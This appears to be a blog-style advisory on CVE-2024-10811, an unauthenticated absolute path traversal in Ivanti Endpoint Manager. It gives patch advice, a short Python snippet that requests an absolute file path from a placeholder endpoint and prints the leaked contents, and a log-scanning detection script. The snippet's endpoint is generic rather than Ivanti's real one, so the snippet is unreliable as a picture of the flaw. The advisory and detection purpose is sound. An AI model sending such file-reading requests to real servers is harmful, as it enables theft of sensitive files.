A recent vulnerability has been discovered in certain versions of Ivanti Endpoint Manager (EPM). This security flaw, designated as CVE-2024-10811, is an absolute path traversal that allows unauthenticated attackers to remotely leak sensitive information. This long read will provide an in-depth breakdown of the vulnerability, including the affected versions, a code snippet illustrating the flaw, original references, and exploit details.
Affected Versions
Versions prior to the 2022 SU6 January-2025 Security Update
Ivanti has already released security patches for the affected versions, so it is highly recommended that users update their EPM software to the latest version to close this security hole.
Code Snippet
The following code snippet demonstrates how the absolute path traversal vulnerability allows an attacker to access sensitive data:
import requests

# Placeholder target and file path, as used in this write-up.
TARGET_URL = 'http://target_server_address'
FILE_PATH = 'C:/sensitive_data.txt'

# The absolute path is passed directly in the query parameter.
exploit_url = f"{TARGET_URL}/vulnerability?path={FILE_PATH}"
response = requests.get(exploit_url)

if response.status_code == 200:
    print(f"Leaked Data: \n{response.text}")
else:
    print("Exploit failed.")
In this code snippet, the TARGET_URL points to the target server, while FILE_PATH contains the absolute path to the sensitive data the attacker intends to access. By exploiting the path traversal vulnerability, data from the target file is leaked, and the attacker can view the sensitive information.
Below are links to the original references discussing CVE-2024-10811:
1. Ivanti Security Advisory
2. NIST National Vulnerability Database
3. Vulnerability Notes Database from CERT/CC
Exploit Details
To perform this exploit, an attacker sends a crafted HTTP GET request to the Ivanti EPM server, with the vulnerable parameter in the request's URL containing the absolute path to the target file. If the server is running an affected version, the attacker will receive a response containing the contents of the specified file.
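A detection-side counterpart to the request described above, added here as an example and not taken from Ivanti or from the original write-up: it scans web access log lines for query parameters whose decoded value is an absolute Windows path and records whether the server answered 200. The log format, sample lines and function names are assumptions, and `/vulnerability` and `path` are the placeholders from the snippet on this page. Matching UNC paths and double-encoded values goes beyond the single drive-letter case shown here.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Absolute Windows path forms: drive letter (C:\ or C:/) and UNC (\\host or //host).
ABS_PATH = re.compile(r"^(?:[A-Za-z]:[\\/]|\\\\[^\\/]|//[^\\/])")

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values (%253A) are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def absolute_path_params(uri):
    """Return (name, decoded value) for each query parameter holding an absolute path."""
    query = urlsplit(uri).query
    pairs = parse_qsl(query, keep_blank_values=True)  # first decoding pass
    decoded = [(name, decode_fully(raw).strip()) for name, raw in pairs]
    return [(name, value) for name, value in decoded if ABS_PATH.match(value)]

# Constructed sample lines; assumed field order: date time client method uri status.
SAMPLE_LOG = """\
2025-01-15 10:02:11 198.51.100.7 GET /vulnerability?path=C:/sensitive_data.txt 200
2025-01-15 10:02:15 198.51.100.7 GET /vulnerability?path=C%253A%255Csensitive_data.txt 404
2025-01-15 10:03:40 192.0.2.10 GET /vulnerability?path=reports/q4.txt 200
2025-01-15 10:04:02 192.0.2.44 GET /index.html?lang=en 200
"""

def scan(log_text):
    """Flag requests whose query string carries an absolute path; note if they got a 200."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip lines that do not match the assumed format
        _date, _time, client, _method, uri, status = fields
        for name, value in absolute_path_params(uri):
            findings.append({"client": client, "param": name,
                             "value": value, "served": status == "200"})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters that legitimately carry protocol-relative URLs (`//host/...`) will also match the UNC pattern, so tune the rule to the parameters your deployment actually exposes.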
Conclusion
CVE-2024-10811 is an absolute path traversal vulnerability in Ivanti EPM that allows attackers to remotely access sensitive information without authentication. Updating to the latest Ivanti EPM version is strongly recommended to remediate this vulnerability. Stay vigilant, keep your software up to date, and always prioritize security best practices.
Timeline
Published on: 01/14/2025 17:15:14 UTC